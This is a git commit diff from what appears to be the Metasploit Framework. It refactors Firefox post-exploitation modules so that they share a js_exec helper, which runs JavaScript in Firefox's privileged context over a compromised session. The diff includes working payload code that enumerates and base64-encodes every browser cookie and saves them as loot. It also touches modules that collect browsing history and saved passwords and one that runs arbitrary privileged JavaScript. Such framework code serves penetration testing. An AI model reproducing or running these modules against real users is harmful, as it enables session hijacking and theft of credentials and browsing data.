Refactors firefox js usage into a mixin.
This commit is contained in:
parent
1353c62967
commit
f94d1f6546
|
@ -9,7 +9,17 @@
|
|||
|
||||
module Msf
|
||||
module Exploit::Remote::FirefoxPrivilegeEscalation
|
||||
|
||||
|
||||
# Sends the +js+ code to the remote session, which executes it in Firefox's
|
||||
# privileged javascript context
|
||||
# @return [String] the results that were sent back. This can be achieved through
|
||||
# calling the "send" function, or by just returning the value in +js+
|
||||
def js_exec(js)
|
||||
print_status "Running the privileged javascript..."
|
||||
session.shell_write("[JAVASCRIPT]#{js}[/JAVASCRIPT]")
|
||||
session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
||||
end
|
||||
|
||||
# Puts the shellcode into memory, adds X flag, and calls it
|
||||
# The js function throws on error
|
||||
# @return [String] javascript code containing the execShellcode() javascript fn
|
||||
|
|
|
@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def html
|
||||
"<!doctype html><html><body><script>#{js}</script></body></html>"
|
||||
end
|
||||
end
|
||||
end
|
|
@ -5,11 +5,9 @@
|
|||
|
||||
require 'json'
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/firefox'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Payload::Firefox
|
||||
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
|
||||
|
||||
def initialize(info={})
|
||||
|
@ -29,12 +27,14 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def run
|
||||
print_status "Running the privileged javascript..."
|
||||
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
|
||||
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
||||
results = js_exec(js_payload)
|
||||
if results.present?
|
||||
begin
|
||||
cookies = JSON.parse(results)
|
||||
cookies.each do |entry|
|
||||
entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
|
||||
end
|
||||
|
||||
file = store_loot("firefox.cookies.json", "text/json", rhost, results)
|
||||
print_good("Saved #{cookies.length} cookies to #{file}")
|
||||
rescue JSON::ParserError => e
|
||||
|
@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post
|
|||
%Q|
|
||||
(function(send){
|
||||
try {
|
||||
var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
|
||||
var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]
|
||||
.getService(Components.interfaces.nsICookieManager);
|
||||
var cookies = [];
|
||||
|
@ -54,7 +55,7 @@ class Metasploit3 < Msf::Post
|
|||
while (iter.hasMoreElements()){
|
||||
var cookie = iter.getNext();
|
||||
if (cookie instanceof Components.interfaces.nsICookie){
|
||||
cookies.push({host:cookie.host, name:cookie.name, value:cookie.value})
|
||||
cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)})
|
||||
}
|
||||
}
|
||||
send(JSON.stringify(cookies));
|
||||
|
|
|
@ -5,11 +5,9 @@
|
|||
|
||||
require 'json'
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/firefox'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Payload::Firefox
|
||||
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
|
||||
|
||||
def initialize(info={})
|
||||
|
@ -30,9 +28,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def run
|
||||
print_status "Running the privileged javascript..."
|
||||
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
|
||||
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
||||
results = js_exec(js_payload)
|
||||
if results.present?
|
||||
begin
|
||||
history = JSON.parse(results)
|
||||
|
|
|
@ -29,9 +29,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def run
|
||||
print_status "Running the privileged javascript..."
|
||||
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
|
||||
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
||||
results = js_exec(js_payload)
|
||||
if results.present?
|
||||
begin
|
||||
passwords = JSON.parse(results)
|
||||
|
|
|
@ -10,6 +10,7 @@ require 'msf/core/payload/firefox'
|
|||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Payload::Firefox
|
||||
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
|
@ -36,9 +37,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def run
|
||||
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
|
||||
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
||||
|
||||
results = js_exec(js_payload)
|
||||
if results.present?
|
||||
print_good results
|
||||
else
|
||||
|
|
Loading…
Reference in New Issue